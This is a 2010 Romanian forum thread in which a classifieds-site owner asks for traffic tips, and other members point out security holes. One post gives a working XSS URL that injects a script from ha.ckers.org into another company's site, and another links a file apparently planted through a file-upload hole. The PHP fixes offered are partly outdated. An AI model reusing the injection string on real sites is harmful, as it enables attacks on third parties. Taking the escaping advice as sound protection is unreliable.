petrolino Posted May 24, 2010 Report Posted May 24, 2010 cam ce trebuie sa fac sa am mai multi vizitatori pe zi? am cam 150 momentan.. dar as vrea sa am mai multi site este: Anunturi Gratuite - 24h.ro - Anunturi Locale Gratuite orice idee e bine primita Quote
petrolino Posted May 24, 2010 Author Report Posted May 24, 2010 am facut si campanie pe google.. imi ia banii degeaba adica vin vizitatori.. dar nu ma incalzeste cu nimic daca nu isi posteaza anunturi... Quote
petrolino Posted May 24, 2010 Author Report Posted May 24, 2010 La ce te referi cand spui : si restul e praf? Quote
andrei.samp Posted May 24, 2010 Report Posted May 24, 2010 daca vrei vizite pe wta pm me iti pot oferi cam intre 7.200 -9.000 pe zigarantat pe zi Quote
ROFL Posted May 24, 2010 Report Posted May 24, 2010 Anunturi Gratuite - 24h.ro - Anunturi - Romania Quote
petrolino Posted May 24, 2010 Author Report Posted May 24, 2010 vad ca merge si la altiihttp://www.investimob.ro/ro/cauta.php?tip_anunt=%22%3Cscript%20src=http://ha.ckers.org/s%3E%3C/script%3Eglumita? Quote
petrolino Posted May 24, 2010 Author Report Posted May 24, 2010 Hai sa-ti mai arat o "glumita":well.. nu e vina mea ca are gauri in el... eu doar am platit pentru site asta Quote
qbert Posted May 24, 2010 Report Posted May 24, 2010 well.. nu e vina mea ca are gauri in el... eu doar am platit pentru site asta Quote
petrolino Posted May 24, 2010 Author Report Posted May 24, 2010 atunci, dati-mi sfaturi cum pot astupa "gaurile" alea... Quote
kNigHt Posted May 24, 2010 Report Posted May 24, 2010 Trece toate GET-urile care sti ca sunt numerice gen tip_anunt, id, si ce mai ai pe-acolo printr-un is_numeric. Dau exemplu pentru tip_anuntif( !is_numeric( $_GET['tip_anunt'] ) ) die("Hackere te-am ars");Pentru cele non-numerice o varianta ar fi:$_GET['tipP'] = htmlspecialchars( stripslashes( mysql_real_escape_string( $_GET['tipP'] ) ) );Ar trebui sa fie de-ajuns.Inca o problema grava de securitate, parolele adminilor nu sunt criptate, sunt tinute in baza de date in plain-text. In plus, sunt foarte simple, cele 2 parole putand fi gasite in foarte multe dictionare, asadar chiar daca vor fi criptate (md5/sha1/etc) tot vor putea fi sparte.Rezumat: Site-ul poate fi distrus in 20 de minute de la prima accesare Daca vorbesc limbi strainte si vrei sa-l faci okay, da-mi un pm cu o adresa de contact si te ajut sa le repari.EDIT: Remote file upload? http://24h.ro/banere/lovetohax.txt Quote
1989 Posted May 24, 2010 Report Posted May 24, 2010 atunci, dati-mi sfaturi cum pot astupa "gaurile" alea...Dai una in cap celui care a facut situ. Quote
cigraphics Posted May 24, 2010 Report Posted May 24, 2010 bineinteles ca poti sa aplici si niste preg_match-uri, is_numeric, maximul de caractere, sa filtrezi inputurile de <script .. sqli sunt foarte multe lucruri de reparat Quote
sonyx Posted May 25, 2010 Report Posted May 25, 2010 sau poate nu-i site-ul lui, a ales altul la intamplare si vrea sa va ceara voua idei sau sa incercati sa-l spargeti.e praf site-u fata de al meu Quote
petrolino Posted May 25, 2010 Author Report Posted May 25, 2010 (edited) sau poate nu-i site-ul lui, a ales altul la intamplare si vrea sa va ceara voua idei sau sa incercati sa-l spargeti.e praf site-u fata de al meu e site-ul meu pe bune,nu caut sa umblu la ce nu e al meu.trimite mail pe adresa de admin si iti voi raspunde ... daca nu era al meu nu ceream mai multi vizitatori pe el Edited May 25, 2010 by petrolino Quote
petrolino Posted January 9, 2011 Author Report Posted January 9, 2011 cicå s-au rezolvat bubele..ia vedeti mai gasiti voi vreuna? sa stiu ce ii mai facmerci Quote
